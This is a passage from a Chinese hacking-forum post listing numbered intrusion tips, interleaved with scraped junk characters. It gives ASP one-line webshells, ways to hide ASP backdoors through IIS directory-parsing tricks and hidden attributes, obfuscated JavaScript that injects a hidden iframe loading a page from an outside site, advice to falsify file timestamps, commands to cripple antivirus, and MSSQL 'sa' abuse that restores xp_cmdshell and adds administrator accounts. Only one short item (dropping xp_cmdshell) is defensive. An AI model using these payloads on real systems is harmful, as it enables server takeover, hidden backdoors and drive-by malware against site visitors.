b).<%Execute(request("go"))%>
* P5 N3 u3 H* _/ `* E( kc).%><%execute request("go")%><%  L$ x5 h, z+ e/ N
d).<script language=VBScript runat=server>execute request("sb")</Script>, i8 b( D: m7 m2 z" Y; G
e).<%25Execute(request("l"))%25>  A! A1 {8 n! s4 N. N
f).<%if request("cmd")<>"" then execute request("pass")%>3 {- X$ `& N- \- L- P4 O

2 {6 h3 {) u% a  z& X" l) P! j52、at "12:17" /interactive cmd
4 A% |( P% K. w" i8 D执行后可以用AT命令查看新加的任务
2 Q1 I# ~2 q8 j9 o/ o. H用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 e1 a6 B2 [" f; q% o, L; T
, O! }8 m, _: X6 R* Z. L6 k" p  F53、隐藏ASP后门的两种方法# q! _% X- A) J9 \
1、建立非标准目录:mkdir images..\
- s$ i0 e2 K( @9 L4 P  W$ S6 j! `+ u拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp, v* W" ]8 X+ E0 p" m' Z3 E
通过web访问ASP木马:http://ip/images../news.asp?action=login' }$ q% ~$ ]" j  a. O. H8 l4 B: C
如何删除非标准目录:rmdir images..\ /s+ O: H+ N# \  H
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:- J/ j6 V! C* g( Z* C; [1 _
mkdir programme.asp
. i2 Y1 y, _- J. _  \* h新建1.txt文件内容:<!--#include file=”12.jpg”-->
; O4 N: o6 O9 q7 s3 J新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
+ w3 i9 ]' u1 M/ y8 a7 Mattrib +H +S programme.asp
* l3 Q& |+ }- h0 Z: i通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. S  j3 v' S+ d+ H" Y
7 ~: ^% b* w( ]4 }54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。9 t' j( Y% E0 s& R& N& E
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
$ Z1 Y4 z/ K6 D4 s! I8 h/ m- h# {/ B8 T! P1 d, M4 C
55、JS隐蔽挂马
  m" k  K6 q3 W& I: j- x; ]1.) _. b. f& y- v3 o
var tr4c3="<iframe src=ht";; C+ E/ p$ F  R0 t2 D* G% q" y( |
tr4c3 = tr4c3+"tp:/";  L' ~! y  _* \, k$ M/ h
tr4c3 = tr4c3+"/ww";' |( a5 l# }! M, E4 r; W
tr4c3 = tr4c3+"w.tr4";
0 o% ]' H4 S+ G) K) \& H3 ktr4c3 = tr4c3+"c3.com/inc/m";2 r1 y: h' Z# S& @( b
tr4c3 = tr4c3+"m.htm style="display:none"></i";
' S; d* K" l1 w0 E: Utr4c3 =tr4c3+"frame>'";+ u6 o& d  i6 v9 U
document.write(tr4c3);- w1 P3 U/ `& Q& x
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
6 ]5 V5 l4 ]1 H
. f" t6 Q( ]: X. b' a) [* \, f2., ~9 W7 i+ x% n
转换进制,然后用EVAL执行。如
; \& t! k# j, V$ ?eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
- N( t. P$ }2 q' ~6 d9 b不过这个有点显眼。% d: _& _( B# u4 z& }$ H
3.
6 e$ H9 C; s1 Y- M7 J. |document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');; O6 @$ g' a5 }! ]- N& n( m
最后一点,别忘了把文件的时间也修改下。
( _, j6 L) V9 ]  P
3 ]' l" P9 d  j56.3389终端入侵常用DOS命令
7 H& ]7 K/ f! D! r+ Ltaskkill taskkill /PID 1248 /t
# ?; ]4 C% v: u1 y- W3 N5 m3 l  U3 V- V+ {$ h  ]
tasklist 查进程
3 d; J  i0 R& U- w9 \! {
: L: R8 {8 M3 c% Hcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限- G! Y' y5 N# Z( n# _: _
iisreset /reboot, P' b- z% r" _! G
tsshutdn /reboot /delay:1    重起服务器
# [* V. L( Z1 d' \" y: ?( P7 b9 y" Z& S
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 l% b* K# E; B/ V( ~
! r( Y* G7 P( q( X. Z5 ^  Equery user 查看当前终端用户在线情况: v) J1 d# H3 C/ e) l

0 H/ D/ x% l+ t9 C要显示有关所有会话使用的进程的信息,请键入:query process *
$ }1 q5 d; ~: g* Y
8 i1 h4 n, Y3 @7 ]  M; E要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
# h& k- ~, N& u! o4 X2 b$ P
' I1 [/ `. @3 H$ }- g要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2% n6 }9 [- v; C, Q0 i9 ~8 U/ z
8 _  w6 ^7 K# k& G
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 b+ r) t, e! W1 H8 q
2 v3 q; @& n$ |+ o- p& V
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
- A) s) y, H5 s% V
) Y0 y# A* ^  O0 O  z) U命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
$ b8 g+ w$ }0 ]' Y+ o& u* a1 {
% ^0 c* U$ o  h; l8 _命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 ^, g3 r& ^) p0 i# b1 n
, F7 W! K8 @$ w! l) k; W% V命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 ^' D3 L5 ~0 _2 t
  q+ t% l+ w- s1 \( e; R56、在地址栏或按Ctrl+O,输入:0 E! Z3 s& _, K# P9 \) r
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;; R2 u( U0 z* v
! ^6 w! \: X2 `+ S
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。$ E$ V( ]3 ~! @5 r/ Q1 h" Q$ h; ]

1 U& j( j  }. K$ Q; Q4 _7 Z0 u57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
1 D$ p, B) h; [0 o# h! E! m2 A用net localgroup administrators是可以看到管理组下,加了$的用户的。
6 a7 _8 A% ?6 j2 _# g: Y4 d, t( b! G: y4 B* B
58、 sa弱口令相关命令
' n! z# x" v, D, s# j6 [! ^; o* s6 ?$ m' I
一.更改sa口令方法:
' ]) B! G6 Q% j3 z9 J用sql综合利用工具连接后,执行命令:4 N; ~, F  [( L' o5 b9 _
exec sp_password NULL,'20001001','sa'
) Z: O# \) e8 O' O5 S* O(提示:慎用!)
1 u; M! _* M+ a/ e
6 J8 V: e; W. g, c# e& c3 Q- H二.简单修补sa弱口令.
& N& p- H# B' T
& l( r5 L, Z6 l8 R方法1:查询分离器连接后执行:/ R' f; L1 E6 w* B: i3 D
if exists (select * from, O# n3 `' e  m
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and) O6 v- ?! v- ~. I# A! ]
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)$ n. A9 g# {5 Y' E$ H% z
" b% T# l% i* ?. L3 Q* k) v+ X
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- H. k1 Y0 C* B3 U$ E5 W
- i: u+ k) M& c' K& F# a4 y3 T
GO
( A+ i' `6 u" r2 b! h3 k; v
2 x! z6 C  R/ d然后按F5键命令执行完毕6 Q3 W. e3 p# K; \0 f

. X6 z0 O5 d4 L9 d& n5 g方法2:查询分离器连接后
+ `- d( N; d' ]2 A第一步执行:use master
+ n5 k1 W, q3 |( Q7 x# C6 W第二步执行:sp_dropextendedproc 'xp_cmdshell'  q* Y' Q4 W: }% W
然后按F5键命令执行完毕% n; k" z5 A6 Y( U6 M* ]( x5 s  W

1 B" S6 w' w0 n
4 ]+ w8 N" ^  R& e三.常见情况恢复执行xp_cmdshell.0 T% I  c$ b5 n. e9 ?

/ F5 `& |! S0 L" d3 T8 ~/ K( _% z% [! y2 [. k* g6 Y) M
1 未能找到存储过程'master..xpcmdshell'.
. g0 L0 y# \7 h   恢复方法:查询分离器连接后,5 a0 Q% p" y9 R& N5 x! ^# y
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int- Q0 J3 |" C. I
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. k! N  n+ z# w! m6 D$ H
然后按F5键命令执行完毕: i7 K  [8 B" B; a  f. i

7 e+ i5 w* d: }( k2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 W$ b+ B( z& S5 Z7 j, \# e; S恢复方法:查询分离器连接后,
4 A1 ]. I5 F8 G* y/ u! \第一步执行:sp_dropextendedproc "xp_cmdshell", E- x  X& V/ O0 B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 C5 [* w2 \1 E; U( l- v5 Y然后按F5键命令执行完毕8 r+ k; L% d( R4 t! p% ]
" d! K: m& p6 Q! }7 i& V
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)7 g& Y7 p4 `: U8 J7 |- ^) V2 |
恢复方法:查询分离器连接后,
4 b% I7 R$ {9 k4 U6 F第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
- G8 V% u# R* Y( o第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           # T7 _. y8 z% }
然后按F5键命令执行完毕
( `/ @8 F* L8 }. Y3 Q9 P
. T: c+ W" @- V4 U四.终极方法.
- `. G7 ~' b8 {3 {0 x如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 Z5 c; ]9 ~* i5 {/ v: L5 Z
查询分离器连接后,
' p- k' A: Q" N; I3 s8 D8 j  E2000servser系统:5 n. x% w5 D; E/ ^0 g' S2 i( q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 K; I/ \; J( c" {8 N2 b) q4 \6 {8 F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', ~9 ^. ~4 u* z
) c6 E- n! \9 d& X$ F
xp或2003server系统:
4 T0 U2 F& c, {. t8 ^
" M; L' A+ T, [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ H9 `% o( _: s$ n. W+ i4 j! h% V) j# k+ I3 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 Q) }9 `8 N$ Z8 V# }5 _$ ?/ y  e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表